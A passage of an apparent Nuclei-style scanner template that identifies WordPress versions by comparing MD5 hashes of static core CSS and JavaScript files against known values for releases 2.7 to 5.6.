4.1 - 4.1.32 - dsl: - - "(\"6e6ae4efeeb4b153955047d63d1f9703\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"38498f539f05402b45802133dc18badd\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"df0a7de26cc6d44c0efd784d78181ad3\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"ecacb2abac2365119b6e02320360f502\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"aa0b126055663de33e6bf670b002c635\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"438f7bb958e6bfdb80110ee0efcada79\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"a1fd22821b6c7702e7342b9b58db49e3\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"7689c288d2a1039dfca195ebb1cbe01a\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"b8a2e9ca1829d1a2f78c21cad088648b\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"52df0ee7031b6591ad05d0175c162761\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"1ee52c1421996228205da31d46d967c3\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"b58173c40720794761eb3c00fd8dd845\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"1f73ae24f66e26b2bb191712b427045d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/jquery-ui-dialog-rtl.min.css" - matchers: - - type: dsl - name: 4.5 - 4.8.15 - dsl: - - "(\"de1c2e841d52991cc738f4b029a4f249\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"ee2dad2b1125172ff11ab1ba0da58055\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"5b2c5aa1462672e6856632e1901ece55\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"3269187936a176a98efc265d8332c5e4\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"37f26aba16eb341b2b1a6e36e5783e7b\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"cb15ea6714abe8a9e96aa3fddaecbfee\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"3e2b2a932eab3ec981a1e511255c36b8\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"db6497f0a0342cc1045689e4ac0c0135\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"ce85a25b6c4c9c30611b6ffc0ec63c31\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"0d69bfe5e1fbf61a192084e6f5acd344\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"96a40386dd22398a9609ffa031e3522d\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"d438f2be1ff29ca5faf2b3c05924df44\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"e77573da19e0ae9e9a18865f6d7c5dca\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"33165e1b75e4cb6d47fdb2202060b684\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/revisions-rtl.min.css" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"0114c79d89d3e0edd14d711c868d4fd7\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"111e2567c39c778be470f37b5ad9952b\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"48a1c7be34fe93a11b1652b2ee8d4a4e\" == md5(body))" - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"8386d6dcf5ce18b47f790acecbd3dd97\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"ecce9ac8713cbff2e3c02b5e74754514\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"aa4b9f80af7993692411777d66e9d2de\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"3689b569f5d0d9eaed70ccfff0394634\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"d1d73d17347055579633e891c06b9efb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/revisions.min.css" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"7db5304ec20677c46bbcbd7b9e9fa350\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"95cf37a45ba51f7acea2600ab04e2050\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"648a668518ad84c937e3370599b079ba\" == md5(body))" - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"f1a70d5db540011fd1dea2d1d4d681d7\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"375d030732f7adf73ada1738d831cffc\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"040c4477b10c9fcf3cffb761dcb0e50f\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"262319e7380fad735c0992d75f8dcdb2\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"ff98e598cfe1516be02f2e4c18b1b834\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/jquery-ui-dialog.css" - matchers: - - type: dsl - name: 4.5 - 4.8.15 - dsl: - - "(\"a0347ba6476ac6b646d145697970e81c\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"8cadbf2aa4edbb8f4c4a70b2c81df4dc\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"0a1016dec8649f08c0f31bbb5c36cd01\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"a6f2b4869450341fd4a85de9e9f1c3d5\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"9ab71d9bdcdc1a83b5314eb96196235a\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"9b76925214a2d6be0836586daa7695af\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"188204f30b17861ace764b0e25e1bdec\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"2725a817d111107de5ee243229f741dc\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"af42a609ba502539031241366138e152\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"22e853bc14fe2ff1360a2f371fbc5c08\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"edc3a1e5f58e31e00a8d3f8e0a6e636c\" == md5(body))" - - type: dsl - name: 3.1 - 3.2.1 - dsl: - - "(\"430c7bd2b88082d9d8518e961dcc0c36\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"0fd5180cf4dd696a5ddba82caec422bc\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"717c172fdbaa9843409c603ca7bf5850\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"b04f063afb472c3d7c9da4c252147d9e\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"feb003c2a47619ac633934cbed3a10b8\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"6e27243fb0ec55268be46392ed3f98a0\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"030e75d241af2af375a74fc49ad66837\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"237c08b52205d548726014723d043ece\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/admin-menu.min.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"1056f3272ebe83f13d5d3f86a82a77f4\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"611efcc5caad0f3085897836e4ce1f3b\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"a6f0b8d7e3d6fa68eb42118e6b3d3b57\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"4a22ae006903e377b68dc697fc0cc46a\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"92589674d68fa4fd88208767abfb29bd\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"b4f403367235a239a2b7e43997e91e65\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"f86faa9e59a5c7d5d71b840bfc1bffdb\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"d17dc4b834c38295ee7d3fd3339eff8b\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"e44f9547d3fbe824463c374e751384ec\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"64bf404fed71473984d2cd0eddef93e2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/revisions.css" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"2311887a1e17b942de617ba70baeda36\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"c9797b3d827e091fda53c01f7131870b\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"336f89e33e253fec3b2e53b2af555c87\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"d266c3e67470bf8f70d91d920b1b50f1\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"e2cd66b3e286187e9d7e00d6436b6d36\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"1d0285dfab8cb53ddc0d294668edc8d1\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"df6537dea2d237c35f611cf2de200b6a\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"e785a905651a0ec0cdb0b5843991eaae\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"b196971abc1abc7ea2cb4bc0a3ab7535\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"d91c84783ccf8c7f179258952826f033\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"e4c46395d986df5b5751711c6055f828\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"41615f8d0cbede34b5ced529fe9e5e7f\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"944cd36ea235bb5195107a4df2ef8334\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"2b0dee38c8e76f4bee6878104104f63c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/admin-menu-rtl.min.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"7834f756df7bcd9b6158cabefe10feb5\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"96086cb89251901ecd80597778deb208\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"e6cda1ba46e89d008f798c05a4e9570e\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"befeb689473b0bf189ec4a39ee920bcd\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"b483b39360a65b857ce7a566fb7825ae\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"abab055d551cb9c52c9d8d0b2a588451\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"cff3ee84962d5176ae88a2a3d64392ac\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"5ea1958d0718eca4ff1a039e3390764e\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"cf0c3b2d9d0d890d9babc90f363f85e9\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"750a05ebf45d615b94c0942523b579d5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/server-side-render.min.js" - matchers: - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"655821377848fd385c27c38c37d61a07\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"bcdd60e8b18b524afcd85e5880b84c33\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"5044b9325a347214c9f52754edffa4a0\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"fdce9089e12dd585e67f28317028a534\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/media-utils.min.js" - matchers: - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"1b84cc0c2ee1b6b872e501d0dc0c7107\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"8730cf437a1617a3d774bcc9686746e3\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"25bfaeb77aca280dafcb30ef8fab62f5\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"5261f82d95f8dd51c4c82631d0661c2a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/media-utils.js" - matchers: - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"9766915643d7c7bf614e35b4121eefbd\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"f91031ce517bb7e6bb0cdd139429a894\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"8356d9d46e55173927fb24ff5ec33d6e\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"e6c9ad652659f0fa8cd0893063da59d9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/server-side-render.js" - matchers: - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"8001395726ac015e4c7e04846fbdaf67\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"7e256da1ed2ab582e23deb3d609a99c5\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"9bb79c23d92ccb79a9ee2117e746e1dc\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"1caaf0eecf4a874d07e07469f4dbfb56\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/privacy-tools.min.js" - matchers: - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"c9bd456399000e52825a2a70165b9163\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"8467330290c25418a66f498d1eb2dbff\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"d05fddf80bf5b83b0d2405ae30d64a5b\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"068afb4a47bd50a2f7714c6c70735fd6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/privacy-tools.js" - matchers: - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"44714ea47fba8f5071cdecc00f7953f3\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"67be42a8a198bae68f48d93072c98256\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"317d353064286735507b5e9345707249\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"4e3acdfd3c994f71bbd24352da00eeb4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/inline-edit-post.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"99166cce46b47d0181263f9a8b630b33\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"4a86ff8375f6af6a1793f20fcdfbbffc\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.3 - dsl: - - "(\"b920b259910fda3187d7669d3344bbe5\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"e3751de1470210ce39ef99ef70f598e5\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"72ed9f7c8543c820a198b27905f6b23d\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"d959c635484426ce7f5044a74dc04224\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"8c56d38ee4c4c97d875fdbc20ac029dd\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"ed03381714c58f75507c8ce11afd8c50\" == md5(body))" - - type: dsl - name: 3.8 - 3.9.33 - dsl: - - "(\"a58d848de37a14f15cd749e3b1f7baec\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"7b3e501ec7c14ac0847c594e02ff3cfa\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"ce5cd22ac555cbc5480519b1973fea37\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"aaab3e624de6193b961731c6be3c8c4b\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"d5cc5dfcade1038403083c43c0e0edb5\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"4653d09cb28e97a8d8f44400af863fae\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"df9a9fa1f5ae362e5566eb609203316e\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"772a837e054ef6820107fbc8f622ef94\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"e2b0b1b02f508015c9495d62d63e9111\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"50faf7bda2c48f21c2c541429518a371\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"830550348b2fcab412282a6f0415d67a\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"e5f05c023be52b6170f029a2c47ea0fb\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"9d57cc3de14e3597d49407ba21650a17\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"581ce00c1f81d6144ca03c4c913f106c\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"53ce6b4e6ae287a145d4c6919a1337ab\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"40a44a54bbdf9b7e30bbf82278ec1142\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"310f82bdb9de9fce084a50495d3b9ba6\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"ef1095216e72a031f4697230a289698f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/tags-suggest.min.js" - matchers: - - type: dsl - name: 4.7.4 - 5.1.8 - dsl: - - "(\"b0e2e58bbcb8654f8f6c09726c8df7e8\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.3 - dsl: - - "(\"5023f66fa980414e5177e9a6b29aff26\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"d305434988f3f831e6f1883d4a750948\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"d9b22becd5790ce6250cf1388f73ce69\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"181ee51385ab5b269fc5058358ed3648\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"9b583c7e26f46e775ba680e47bcb5594\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"96ede3a05eadc3faf83991ef0af63bff\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/api-fetch.js" - matchers: - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"f09de7c7aeb73fa3f8a1e53e6ff4b305\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"50516221babd83d0bf95ea4ecd5d58a0\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"c5d94ec07709fba77643a6774d477a7b\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"36a5d2e1b03d0efed47043e216c3d2f9\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"c43ea46c5886fd155f2fd7994ce6310d\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"5e072b558117cc528e20274eda36d809\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/api-fetch.min.js" - matchers: - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"da6b492eec5e352193be733652fb3209\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"67515582038f82ad0b094aa5e0bc1dcd\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"e52101f853577a9ec8e7cb8137e33640\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"19ce453efbd74d06a81ec228ce1d5247\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"0edb88ae670f70a377b6ef4eef223c60\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"32f22e45308fe3062b9f86b0fc710934\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/block-serialization-default-parser.min.js" - matchers: - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"1d585ce73cc724afa36727542a43ac97\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"acde1b98f59602f08ceb5fd36bd116de\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"8aec553ccda8f9b035a814de6f28e029\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"18c4e388773b6895f69f94afba477dad\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"3cf7496ac98d8d4a80dbd992c88a2213\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"df9f83c7ab58ba1c731325ce127bf00f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/block-serialization-default-parser.js" - matchers: - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"7d8ad191246e8e6dea0203f73f8cc061\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"70b8c60b095f1d4eddeb602e80d7cb85\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"af4267c09a196d31e97cdd99c7eeebe9\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"a9a86cca30847bf34025e2a4342b6af8\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"68a1d3d8f24e182f39bbe411c9ce2fdf\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"ca2bf1e3d15250cb35bab844663c6e38\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/blob.js" - matchers: - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"e6c27ec1d6668699f712c56b4a819f4d\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"cdd5db3c87800508f5e73210f76c4c88\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"58bfb37a8081b4eda6e024b135919aa3\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"b76f444fce3aa2ba000a9b2c1a50b381\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"f12d56e6713d792b1245c9699d14f7a9\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"35ce2c589e64f4e72999b2d6f8a9c39f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/blob.min.js" - matchers: - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"f8b9570fbad012216e0ad8a1ea84187e\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"d4272a74803c18ece3799c135f196ab0\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"7034bef89a578a00a44d10809d7394a0\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"2984c649c84fffa8beb5ab6fe6c70ece\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"fafa70f30162fb34955b073cbb99f885\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"b5a777b54fbdb90ff36aea7830fed7fa\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/autop.min.js" - matchers: - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"a207f32426009dc93b26585ed42aee17\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"6284d2de63c7aee03f2278c7dc98356c\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"b7cd543a0b0cd07e45cd1bc25a638726\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"2e7ffbb6b277d278b6effac42f48f3c1\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"573ab119d54915cd9f53682769c50cf1\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"317b59ed97f57a1f932895e1906e6f32\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/autop.js" - matchers: - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"7ee01d53b8d7ab46463b64f64d504520\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"14123b164f7ad2487fa8e143d22ac143\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"31e1f40e1156574c98fc4b0cf735857a\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"ff51ce763fa631677610fab1cb95aab1\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"676d8f976d7f2d5a14dd15bff63b288a\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"450bf21d976c0b84b175f3578b865f4b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/list-reusable-blocks/style-rtl.css" - matchers: - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"d3835cf3e87d8764e8c9ba8e470af641\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"2cb783b7dd13ccb77d1eb4ac11141591\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"8fc455cde485dbee10fb0d2d21a6e240\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"e777f5e1e54a62909a9c667a857c8a06\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"761147c3559453c26dbbac541a1db6c0\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"8828bb7def5a91617f8dc92ff1d54cb6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/list-reusable-blocks/style.css" - matchers: - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"690c76f64d35502bc7e4c367bb4efea4\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"02df3e2c9415c49b296e4a9142e3f385\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"51e05fb6e2cd8020f046629e1d214bdd\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"40b486615e5c5a7435a067a51b8e6c5c\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"502c81a537b4ba42a46393bc5ff5115a\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"8a424a086235b9d27ce3aeb9a7d895ae\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/nux/style-rtl.css" - matchers: - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"9a5451d5e895048dffe2507330037cca\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"1fd071e6f21a55c48664fa01f510d3ff\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"067f1fa67dc68c39b293875357a49b0f\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"39d93ff8fb552ad4b4f4a53c21b64aa4\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"548185fa04074d4d27d1df6afe60e4ef\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - 